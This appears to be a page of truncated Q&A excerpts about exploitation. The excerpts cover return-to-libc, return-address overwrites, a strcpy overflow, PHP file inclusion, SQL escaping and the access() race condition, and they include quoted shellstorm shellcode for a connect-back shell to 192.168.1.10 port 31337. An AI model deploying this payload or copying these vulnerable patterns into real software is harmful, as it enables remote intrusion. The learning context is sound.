exploit

I'm writing a return to libc attack for my systems security class. First, the vulnerable code: //vuln.c #include <stdio.h> #include <stdlib.h> int loadconfig(void){ char buf[1024]; sprintf(buf, "%s/.config", getenv("HOME")); return 0; } int main(int argc, char **argv){ loadconfig(); return 0; } I want to use a return to libc attack. Compiling and debugging the program: $ gcc -g -fno-stack-protector -o vuln vuln.c $ gdb vuln (gdb) break loadconfig (gdb) run Reached breakpoint blah blah blah. (gdb) p $ebp $1 = (void *) 0xbfffefb0 (gdb) p system $2 = {<text variable, no debug info>} 0x0016db20

I just wrote a C Code which is below : #include<stdio.h> #include<string.h> void func(char *str) { char buffer[24]; int *ret; strcpy(buffer,str); } int main(int argc,char **argv) { int x; x=0; func(argv[1]); x=1; printf("\nx is 1\n"); printf("\nx is 0\n\n"); } Can please suggest me as to how to skip the line printf("\nx is 1\n"); . Earlier the clue which I got was to modify ret variable which is the return address of the function func . Can you suggest me as to how to change the return address in the above program so that printf("\nx is 1\n"); is skipped. I have posted this question because I

Here is a copy of code from shellstorm: #include <stdio.h> /* ipaddr 192.168.1.10 (c0a8010a) port 31337 (7a69) */ #define IPADDR "\xc0\xa8\x01\x0a" #define PORT "\x7a\x69" unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\xb0\x66\xb3\x01\x51\x6a\x06\x6a" "\x01\x6a\x02\x89\xe1\xcd\x80\x89" "\xc6\xb0\x66\x31\xdb\xb3\x02\x68" IPADDR"\x66\x68"PORT"\x66\x53\xfe" "\xc3\x89\xe1\x6a\x10\x51\x56\x89" "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe" "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31" "\xc0\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd" "\x80"; main() {

What are the dangerous characters that should be replaced in user input when the users' input will be inserted in a MySQL query? I know about quotes, double quotes, \r and \n. Are there others? (I don't have the option of using a smart connector that accepts parameters so I have to build the query myself and this will be implemented in multiple programming languages, including some obscure ones so solutions such as mysql_real_escape_string in PHP are not valid) mysql_real_escape_string() from mysql.com docs: The string in from is encoded to an escaped SQL string, taking into account the

I'm trying to teach myself about buffer overflows and exploitation in C++. I'm an intermediate C++ guy, at best, so bear with me. I've followed a few tutorials, but here's some example code to illustrate my question: #include <string> #include <iostream> using namespace std; int main() { begin: int authentication = 0; char cUsername[10], cPassword[10]; char cUser[10], cPass[10]; cout << "Username: "; cin >> cUser; cout << "Pass: "; cin >> cPass; strcpy(cUsername, cUser); strcpy(cPassword, cPass); if(strcmp(cUsername, "admin") == 0 && strcmp(cPassword, "adminpass") == 0) { authentication = 1; }

I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...). This is the code of index.php, for reference: <?php include ("includes/header.php"); // Grab inputs $page = $_GET[page]; if ($page=="") { include("home.html"); } else { include ($page . '.php'); } include ("includes

I've been doing some shell writing and came across a recommendation for access() to check whether a file exists, can be read, etc. Seems super easy to implement and faster than stat(). When I started looking at the man page for it, I noticed that it is NOT recommended for use because it can lead to a security hole. The man page says this: Using access() to check if a user is authorized to e.g. open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. Does anyone know